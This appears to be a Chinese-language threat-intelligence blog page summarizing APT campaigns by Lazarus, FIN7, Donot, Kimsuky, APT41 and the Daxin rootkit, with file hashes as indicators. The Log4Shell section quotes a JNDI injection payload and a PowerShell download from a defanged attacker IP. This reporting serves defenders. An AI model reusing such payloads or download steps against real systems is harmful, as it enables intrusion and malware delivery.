志所向,一往无前;愈挫愈勇,再接再厉。
{{ date }}
{{ time }}
Lazarus在最近发起了新的一轮攻击活动,在这次攻击中,攻击者通过社会工程学向受害者发送一个伪装成PDF文件的MacOS二进制文件,在文件内部嵌入一个主题为”Crypto.com”招聘职位的虚假信息。
Crypto.com是世界领先的的加密货币交易平台之一,此次活动主要针对的目标为加密领域的开发人员,其目的可能是窃取数字资产和加密货币。
| Sha1 | 文件名 |
| a57684cc460d4fc202b8a33870630414b3bbfafc | 1st Stage, xxx |
| 65b7091af6279cf0e426a7b9bdc4591679420380 | Crypto.com_Job_Opportunities_2022_ confidential.pdf |
| 1f0f9020f72aa5a38a89ffd6cd000ed8a2b49edc | 2nd Stage, WifiAnalyticsServ |
| 1b32f332e7fc91252181f0626da05ae989095d71 | 3rd stage, wifianalyticsagent |
该组织属于民间APT组织,自2015年以来,FIN7成员参与了针对100多家美国公司的高度复杂的恶意软件活动,主要集中在餐馆,游戏和酒店行业。
该组织通常使用针对受害者的恶意软件网络钓鱼攻击,希望能够通过他们渗透系统窃取银行卡数据并将其出售。
JSSLoader为该APT在进行攻击时使用的一个组件,虽然JSSLoader以最小化的.Net RAT而闻名,但是麻雀虽小,五脏俱全, 比如持久化、自动更新、恶意软件下载、数据泄露等等功能都包含。
XLL插件是Excel文件的扩展,实际上只是一个普通的dll文件。Excel对其xll插件创建了关联,使其能够双击运行。
XLL插件显示的图标与其他Excel文件显示的图标非常相似, 普通用户不会注意到XLL与其他Excel文件之间的任何区别,并且可以被诱导打开。
Donot“肚脑虫”(APT-Q-38)是疑似具有南亚背景的APT组织,其主要以周边国家的政府机构 为目标进行网络攻击活动,通常以窃取敏感信息为目的。该组织具备针对Windows与Android双平台的攻击能力。
在对该组织追踪朔源的过程中,发现Donot使用了一系列新型的后门框架,该框架名为Jaca,根据组件的功能分别分为下载执行组件、文件上传组件、截图组件、文件收集组件、键盘鼠标消息记录组件、浏览器敏感信息窃取组件、移动磁盘文件收集组件等等。
| 文件名 | S03.doc |
| MD5 | 3fabf3b97362af460abe98855c7caef8 |
| 文件类型 | Office word文档 |
| 文件名 | HG5HlDPqsnr3HBwO.php |
| Md5 | 21b82530fa520eecd5aa677fa7ec0879 |
| 文件类型 | Office word模板 |
| 文件名 | pgixedfxglmjirdc.dll |
| Md5 | b38586849d45649db67189c1e7c0397e |
| 文件类型 | dll |
Kimsuky 是位于朝鲜的APT组织,又名(Mystery Baby, Baby Coin, Smoke Screen,BabyShark, Cobra Venom)等,最早由Kaspersky在2013年披露。
该组织长期针对于韩国的智囊团、政府外交、新闻组织、教育学术组织等进行攻击,在过去几年里,他们将攻击目标扩大到包括美国、俄罗斯和欧洲各国在内的国家。主要目的为窃取情报、间谍活动等。
Kimsuky使用各种鱼叉式网络钓鱼和社会工程方法来获取对受害者网络的初始访问权限。
| 文件名 | ESTCommon.dll |
|---|---|
| Md5 | 6844589e2962b3914824cc8b90a552a6 |
| 文件类型 | Dll x64 |
恶意程序将所有可见的字符串和重要的API使用自定义的加密算法进行加密,加密后的数据以十六进制的ANSII格式存放,当需要使用时调用解密函数进行解密。如下图:
近期观察到Lazarus正在针对区块链技术和加密货币行业的各种组织,包括加密货币交易所、去中心化金融协议、游戏赚钱加密货币视频游戏、加密货币贸易公司、风险投资基金投资在加密货币中,以及大量加密货币或有价值的不可替代代币的个人持有者。
Lazarus使用各种通信平台对受害者进行社会工程学,以鼓励受害在在windows或者macOS上下载木马化的加密货币应用程序,然后攻击者使用这些应用程序访问受害者的计算机,在受害者的网络环境中传播恶意软件,并获取私钥或利用其他安全漏洞。这些活动支持发起欺诈性区块链交易的其他后续活动。
| 文件名 | Md5 |
|---|---|
| Esilet.dmg | 53d9af8829a9c7f6f177178885901c01 |
| Esilet-tmpg7lpp | 9578c2be6437dcc8517e78a5de1fa975 |
该恶意程序通过macOS系统专用的磁盘映像格式dmg分发,可以通过命令hdiutil来挂载文件并提取应用程序。
2021年12月9日晚,基于Java的日志记录程序Log4j的一个远程执行漏洞(CVE-2021-44228)POC被公开。攻击者使用${}关键标识符触发JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞并成功利用此漏洞在目标服务器上执行任意代码。
今年4月份,有安全研究人员发现Lazarus利用Log4jShell漏洞入侵VMWare Horizon服务器,攻击者使用类似于${jndi:Idap://example} 的payload然后启动powershell从hxxp://185.29.8.18/htory.exe下载恶意程序,该命令由ws_TomcatService.exe生成。
Daxin是一个高度复杂的rootkit后门,具有复杂、隐秘的命令于控制功能。使远程攻击者能够与未直接连接到互联网的安全设备进行通信,运行攻击者深入挖掘目标网络并泄露数据而不会引起怀疑。
和普通rootkit恶意程序利用合法的操作系统进程不一样,Daxin利用服务器之间合法的安全网络流量来感染计算机并避免检测。通过劫持TCP通信,可以将恶意通信隐藏在被认为合法的流量中而不被发现,被劫持的流量本质上可以被认为是被加密的TCP隧道,还能够通过受攻击组织内受感染计算机网络中继其通信,攻击者可以选择跨受感染计算即的任意路径并发送一条命令,指示这些计算机建立请求的连接。
从复杂的通信过程来看,Daxin开发者投入大量精力来开发通信技术,这些技术可以让恶意流量与目标网络的正常网络流量融合在一起。
| 文件名 | Md5 |
|---|---|
| Wantd.sys | b0770094c3c64250167b55e4db850c04 |
APT41早在2012年就开始活跃。据观察,该小组针对14个国家/地区的医疗保健,电信,技术和视频游戏行业,也进行一些经济私利驱动的入侵,尤其针对视频游戏产业,包括偷窃源代码和数字证书,虚拟货币操纵和尝试部署勒索软件。
卡巴斯基2022年曝光了恶意程序Moonbounce,并将其归因于APT41。恶意程序修改了UEFI固件中的dxe驱动文件。因为它不是存储在硬盘中,因此在格式化硬盘或者更换硬盘时不会清除恶意程序。
修改后的dxe驱动文件能够拦截和引导UEFI启动的流程,引入一个复杂的感染链,并且只在内存中运行,硬盘上没有留下攻击痕迹。这样的bootkit不仅更隐蔽而且更难以缓解。
UEFI固件中被修改的dxe驱动详细文件信息如下:
| 文件名 | Core_dxe |
|---|---|
| Md5 | 2d4991c3b6da35745e0d4f76dffbca56 |
| 文件类型 | EFI_BOOT_SERVICE_DRIVER |
映射到内存的驱动
| MD5 | 2ce20fbf09f74a819486a7815ae8e47d |
|---|---|
| 文件类型 | Kernel driver |
驱动APC注入到svchost的dll文件
| MD5 | bcf786ac5cfe3b6e9ceacc6733827355 |
|---|---|
| 文件类型 | Dll |
